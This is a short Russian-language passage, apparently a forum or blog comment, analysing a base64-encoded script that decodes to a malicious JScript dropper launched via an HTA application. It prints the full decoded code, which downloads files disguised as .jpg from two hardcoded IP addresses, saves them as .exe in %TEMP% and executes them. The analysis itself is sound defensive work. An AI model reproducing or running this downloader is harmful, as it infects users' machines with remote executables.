Текст закодированный в base64 преобразует в исходный код, например, var s = Base64.decode(b) - в итоге s будет равно вот такому червяку:
var email = "mail@allweld.ru";
function dl(fr,url,ext) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+ext;
var dn = 0;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() {
if (xo.readyState == 4 && xo.status == 200) {
var xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(xo.ResponseBody);
if (xa.size > 0) {
dn = 1; xa.position = 0;
xa.saveToFile(fn,2);
try {
ws.Run(fn,1,1);
}catch (er) {};
};
xa.close();
};
};
try {
xo.open("GET",url, false); xo.send();
}
catch (er) {};
};
dl('mail@allweld.ru','http://185.49.68.140/August.jpg','.exe');
dl('mail@allweld.ru','http://185.49.68.141/All.jpg','.exe');
и далее. Открывает HTA приложение, из под которого вся эта "кака" и работает.